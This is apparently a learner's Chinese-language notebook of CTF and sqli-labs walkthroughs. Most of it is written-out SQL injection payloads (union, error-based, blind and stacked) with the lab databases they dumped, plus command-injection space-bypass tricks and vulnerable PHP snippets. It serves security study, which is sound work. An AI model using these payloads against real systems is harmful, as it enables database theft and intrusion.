1. [HCTF 2018]WarmUp
PHP 代码审计
在地址栏读取 php 文件
php 学习
warmserver 下载安装使用
在多个文件夹下打开 flag
2. [极客大挑战 2019] Havefun
php 中 get 请求知识点
3. [极客大挑战 2019] PHP
下载爆破工具 dirsearch 解压,再用一系列命令安装 python3 以上版本,pip,pip3,pip3 版本升级,解决代理权限问题,找到一系列文件之后,因为是备份
常用的备份文件名和文件后缀,利用这俩信息通过 python 代码在网址中遍历找到对应的压缩包
下载压缩包打开,index.php— 根据提示打开 class.php
读取 class.php 代码,找到关键信息,之后序列化,再反序列化,解决魔方函数问题,最后找出 flag
4. [GXYCTF2019]Ping Ping Ping
ip 地址知识
dos 命令
ls - 列出目录内容
cat 命令用于连接文件并打印到标准输出设备上。
php 代码解读
绕过空格办法
cat flag.txt
catIFS$9flag.txt
cat<flag.txt
cat<>flag.txt
变量拼接小技巧
正则表达式
5. [极客大挑战 2019] EasySQL1
登录 SQL 语句:select * from admin where username = ‘用户输入的用户名‘ and password =‘用户输入的密码’
用户输入的内容可由用户自行控制,例如可以输入 ‘or 1 = 1 -- 空格
SQL 语句:select * from admin where username =’’ or 1=1 --'and password =‘用户输入的密码’
其中 or 1=1 永远为真,–注释后面内容不再执行,因此 SQL 语句执行会返回 admin 表中的所有内容
抓包找出万能密码 (找出具体是哪种后台语言,确定万能密码)
6. [极客大挑战 2019] HardSQL
报错注入
1’or (updatexml (1,concat (0x7e,database (),0x7e),1)) or’
数据库:geek
1’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or’
表:H4rDsq1
1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))or’
列:id,username,password
1’or(updatexml(1,concat(0x7e,(select(group_concat(right(password,100)))from(geek.H4rDsq1)),0x7e),1))or’
flag
9-590c-45da-bfef-90828a1dc70e}
7. BUU SQL COURSE 1
火狐 f12 测试,找到可疑文件,进入 http://a27afc80-fc2d-45b7-bcea-90d52c0850be.node4.buuoj.cn:81/backend/content_detail.php?id=1
判断:and 1 = 1;and 1 = 2;1’
测字段数:1 order by 2
显位:id = 0 union select 1,2 都可以显示
爆库:
id=0 union select 1,group_concat(schema_name) from (information_schema.schemata)
information_schema,ctftraining,mysql,performance_schema,test,news
id=0 union select 1,database()
news
爆表:
id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,contents
爆列:
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’
id,username,password
爆值:
0 union select 1,group_concat(id,username,password) from (admin)
1 admin 4a581b825861c72e390fa6fbc1aa2063
8. [第一章 web 入门] SQL 注入 - 1
判断
and 1 = 1; and 1 = 2; 不报错 字符型
#不行,–+ 可以
测字段数
id=1’ order by 3 --+
id=1’ order by 4 --+
显位:
id=0’ union select 1,2,3–+
2,3 显位
爆库:
id=0’ union select 1,2,database()–+
note
id=0’ union select 1,2,group_concat(schema_name) from (information_schema.schemata)–+
information_schema,mysql,note,performance_schema
爆表:
id=0’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
fl4g,notes
爆列:
id=0’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘fl4g’–+
fllllag
id=0’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘notes’
id,title,content
爆值:
0’ union select 1,2,group_concat(fllllag) from (fl4g)
n1book
9. 第一章 web 入门] SQL 注入 - 2
根据提示进入 login.php
查看源代码得到提示输入?tips=1 后会得到报错提示
但是发现联合注入貌似不太行,于是尝试报错注入,利用 burp 抓包
爆库:
1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
1’ and extractvalue(1,concat(0x7e,database(),0x7e)) #
note
爆表:
1’ and updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
对 select 进行绕过
fl4g,users
爆列:
1’ and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_schema=database()),0x7e),1) #
flag,id,username,passwd
1’ and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name=‘fl4g’),0x7e),1) #
flag
1’ and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name=‘users’),0x7e),1) #
id,username,passwd
爆值:
1’ and updatexml(1,concat(0x7e,(seselectlect group_concat(flag
) from (fl4g
)),0x7e),1) #
n1book
10. RedTiger’s Hackit Level1
Level1 Simple SQL-Injection
查看源代码发现 cat=1 点击进入
发现注入点
判断:
and 1 = 1;and 1 = 2;1’;
数字型注入
测字段数:
?cat=1 order by 4–+
?cat=1 order by 5–+
字段数为 4
显位:
?cat=1 union select 1,2,3,4–+
成功把 3,4 显示出来
爆库:
?cat=1 union select 1,2,3,database()–+
hackit
爆表:
?cat=1 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()–+
发现不能显示
题目提示 level1_users
爆列:
?cat=1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘level1_users’–+
没啥结果,不如问题简单化
一般有 username,password
爆值:
?cat=1 union select 1,2,username,password from level1_users–+
Hornoxe
thatwaseasy
11. RedTiger’s Hackit Level2
万能密码
1’ or 1 = 1
1’ or 1 = 1
12. RedTiger’s Hackit Level3
13. sqli-labs-master/Less-1
字符型联合、报错、布尔、时间
- 判断
?id=1 and 1 = 1–+
?id=1 and 1 = 2–+
?id=1’ and 1 = 1–+
?id=1’ and 1 = 2–+
字符型 - 判断字段数
?id=1’ order by 3–+
?id=1’ order by 4–+
字段数为 3 - 显位
?id=0’ union select 1,2,3–+
成功显示 2,3 - 爆库
0’ union select 1,2,group_concat (schema_name) from (information_schema.schemata)–+ - 爆表
0’ union select 1,2,group_concat (table_name) from information_schema.tables where table_schema=database ()–+ - 爆字段
- 爆值
14. sqli-labs-master/Less-2
数字型联合、报错、布尔、时间
-
判断
1 和 1‘,数字型 -
判断字段数
id=1 order by 3–+
id=1 order by 4–+
字段数为 3 -
显位
id=0 union select 1,2,3–+
2,3 位置成功显示出来
说明既是 union 联合注入又存在 2,3 显示位 -
爆库
id=0 union select 1,2,group_concat (schema_name) from (information_schema.schemata)–+
所有数据库:information_schema,challenges,mysql,performance_schema,pikachu,security,sys
id=0 union select 1,2,database()–+
当前数据库:security -
爆表
id=0 union select 1,2,group_concat (table_name) from information_schema.tables where table_schema=database ()–+
security 数据库:emails,referers,uagents,users -
爆列
id=0 union select 1,2,group_concat (column_name) from information_schema.columns where table_schema=database () and table_name=‘users’–+
security 数据库 users 表:id,username,password -
爆值
id=0 union select 1,2,group_concat (concat_ws (username,password)) from (users)–+
security 数据库 users 表 username,password 列:Angelina,I-kill-you -
代码
1 | $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; |
15. sqli-labs-master/Less-3
字符型联合、报错、布尔、时间
-
判断
id=1’)–+
xx 型注入 -
判断字段数
id=1’) order by 3–+
id=1’) order by 4–+
字段数为 3 -
显位
id=0’) union select 1,2,3–+
2,3 成功回显 -
爆库
id=0’) union select 1,2,group_concat (schema_name) from (information_schema.schemata)–+
所有数据库:information_schema,challenges,mysql,performance_schema,pikachu,security,sys
id=0’) union select 1,2,database()–+
当前数据库:security -
爆表
id=0’) union select 1,2,group_concat (table_name) from information_schema.tables where table_schema=database ()–+
security 数据库:emails,referers,uagents,users -
爆列
id=0’) union select 1,2,group_concat (column_name) from information_schema.columns where table_schema=database () and table_name=‘users’–+
security 数据库 users 表:id,username,password -
爆值
id=0’) union select 1,2,group_concat (concat_ws (username,password)) from (users)–+
security 数据库 users 表 username,password 列:Angelina,I-kill-you -
代码
1 | $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; |
16. sqli-labs-master/Less-4
字符型联合、报错、布尔、时间
-
判断
id=1")–+
双引号型注入 -
判断字段数
id=1") order by 3–+
id=1") order by 4–+
字段数为 3 -
显位
id=0") union select 1,2,3–+
2,3 成功回显 -
爆库
id=0") union select 1,2,group_concat (schema_name) from (information_schema.schemata)–+
所有数据库:information_schema,challenges,mysql,performance_schema,pikachu,security,sys
id=0") union select 1,2,database()–+
当前数据库:security -
爆表
id=0") union select 1,2,group_concat (table_name) from information_schema.tables where table_schema=database ()–+
security 数据库:emails,referers,uagents,users -
爆列
id=0") union select 1,2,group_concat (column_name) from information_schema.columns where table_schema=database () and table_name=‘users’–+
security 数据库 users 表:id,username,password -
爆值
id=0") union select 1,2,group_concat (concat_ws (username,password)) from (users)–+
security 数据库 users 表 username,password 列:Angelina,I-kill-you -
代码
1 | $id = '"' . $id . '"'; |
17. sqli-labs-master/Less-5
字符型报错、布尔、时间(’,%’)
- 判断
一系列测试貌似没有啥结果,报错注入成功,用 sqlmap 探测一下发现有报错注入、布尔盲注、时间盲注 - 爆库 (以报错注入讲解)
1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
1’ and extractvalue(1,concat(0x7e,database(),0x7e))–+
当前数据库:security - 爆表
1’ and updatexml (1,concat (0x7e,(select group_concat (table_name) from information_schema.tables where table_schema=database ()),0x7e),1)–+
security 数据库:emails,referers,uagents,users - 爆列
1’ and updatexml (1,concat (0x7e,(select group_concat (column_name) from information_schema.columns where table_schema=database ()),0x7e),1)–+
security 数据库:id,email_id,id,referer,ip_addre
1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),0x7e),1)–+
USER,CURRENT_CONNECTIONS,TOTAL
没完全爆出来,建议使用盲注,left(),right () 函数在这里貌似不行
1’ and updatexml (1,concat (0x7e,(select column_name from information_schema.columns where table_name=‘表名’ limit 0,1),0x7e),1) --+
不断更改 limit () 取值范围即可
发现有 username,password
5. 爆值
1’ and updatexml (1,concat (0x7e,(select group_concat (username,password) from (security.users)),0x7e),1)–+
DumbDumb,AngelinaI-kill-you,Dum
同理不断更改 limit () 就可得到全部内容
- 代码
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
mysql_error () 函数返回上一个 MySQL 操作产生的文本错误信息
18. sqli-labs-master/Less-6
字符型报错、布尔、时间(",’")
-
判断
一系列测试貌似没有啥结果,报错注入成功,用 sqlmap 探测一下发现有报错注入、布尔盲注、时间盲注
稍微有点区别,之前报错注入和盲注都是单引号,这里是双引号 -
爆库 (以报错注入讲解)
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
1" and extractvalue(1,concat(0x7e,database(),0x7e))–+
当前数据库:security -
爆表
1" and updatexml (1,concat (0x7e,(select group_concat (table_name) from information_schema.tables where table_schema=database ()),0x7e),1)–+
security 数据库:emails,referers,uagents,users -
爆列
1" and updatexml (1,concat (0x7e,(select group_concat (column_name) from information_schema.columns where table_name=‘users’),0x7e),1)–+
USER,CURRENT_CONNECTIONS,TOTAL
没完全爆出来,建议使用盲注,left(),right () 函数在这里貌似不行
1" and updatexml (1,concat (0x7e,(select column_name from information_schema.columns where table_name=‘表名’ limit 0,1),0x7e),1) --+
不断更改 limit () 取值范围即可
发现有 username,password -
爆值
1" and updatexml (1,concat (0x7e,(select group_concat (username,password) from (security.users)),0x7e),1)–+
DumbDumb,AngelinaI-kill-you,Dum
同理不断更改 limit () 就可得到全部内容 -
代码
1 | $id = '"'.$id.'"'; |
19. sqli-labs-master/Less-7
字符型布尔、时间
-
判断
sqlmap 跑一下,发现是布尔和时间盲注 -
盲注
既然是盲注,那就手工操作或者 sqlmap、脚本跑一下,手工比较麻烦,在这里我采取无脑 sqlmap 跑一下 -
代码
1 | $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; |
发现 mysql_error () 被注释掉,所以报错、联合查询不了
20. sqli-labs-master/Less-8
字符型布尔、时间(’,%’)
-
判断
sqlmap 跑一下,发现是布尔或时间盲注 -
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
21. sqli-labs-master/Less-9
字符型布尔、时间(’,%’)
- 判断
布尔、时间盲注 - 代码
1 | $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
22. sqli-labs-master/Less-10(sqlmap 没跑出来!!!)
字符型布尔、时间(",’")
手工实现时间盲注
盲注为双引号盲注
-
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
23. sqli-labs-master/Less-11
字符型联合、报错、布尔、时间
’
-
首先它是 post 型,其次发现万能密码可行,至此发现一条普遍规律
在 url 中建议用–+ 注释,在 POST 注入中用 #注释 -
查看源代码,发现字符型联合注入,报错注入都可
-
使用 salmap 没跑出来
-
判断
使用 1,1’字符型 -
判断字段数
1’ order by 2 #
1’ order by 3 #
字段数为 2 -
显位
1’ union select 1,2 #
1,2 位置成功显示出来 -
爆库
1’ union select 1,group_concat (schema_name) from (information_schema.schemata) # -
爆表
1’ union select 1,group_concat (table_name) from information_schema.tables where table_schema=database () # -
爆列
-
爆值
-
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
24. sqli-labs-master/Less-12
字符型联合、报错、布尔、时间
与上一题思路一样,只是变成 ")
-
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
25. sqli-labs-master/Less-13(sqlmap 布尔没跑出来!!!)
字符型报错、布尔、时间
额。还是类似,只不过变成’)
-
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
26. sqli-labs-master/Less-14(sqlmap 布尔没跑出来!!!)
字符型报错、布尔、时间
查看源代码,发现只能报错注入,是 "
-
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
27. sqli-labs-master/Less-15(sqlmap 布尔没跑出来!!!)
字符型布尔、时间
’
28. sqli-labs-master/Less-16(sqlmap 布尔、时间没跑出来!!!)
字符型布尔、时间
")
29. sqli-labs-master/Less-17
字符型布尔、时间
’
27. [强网杯 2019] 随便注
- 判断类型
1 or 1 = 1 #
1’ or 1 = 1 #
字符型 - 判断字段数
1’ order by 2 #
1’ order by 3 #
字段数为 3 - 联合注入?
0’ union select 1,2 #
得到:return preg_match ("/select|update|delete|drop|insert|where|./i",$inject);
说明对这些字符进行了过滤,所以联合注入貌似不得行 - 堆叠注入
爆库:0’;show databases;#
爆表:0’;show tables;#
爆列:0’;show columns from words;#
0’;show columns from1919810931114514;#
为什么用反引号呢?因为当数字型字符作为字段、表、库名查询时,应该用反单引号括起来输入之后得到 - 爆值
PREPARE sqla from ‘[my sql sequece]’; 预定义 SQL 语句
EXECUTE sqla; 执行预定义 SQL 语句
(DEALLOCATE || DROP) PREPARE sqla; 删除预定义 SQL 语句
通过变量进行传递
SET @tn = ‘flag’; 存储表名
PREPARE sqla from @sql; 预定义 SQL 语句
EXECUTE sqla; 执行预定义 SQL 语句
(DEALLOCATE || DROP) PREPARE sqla; 删除预定义 SQL 语句
PREPARE 语句准备好一条 SQL 语句,并分配给这条 SQL 语句一个名字供之后调用。
准备好的 SQL 语句通过 EXECUTE 命令执行,通过 DEALLOCATE PREPARE 命令释放掉。
本题即可利用 char () 方法将 ASCII 码转换为 SELECT 字符串,接着利用 concat () 方法进行拼接获得查询的 SQL 语句,最后执行即可,payload 如下:
1’;SET @sql=concat(char(115,101,108,101,99,116)," * from 1919810931114514 ");PREPARE sqla from @sql;EXECUTE sqla;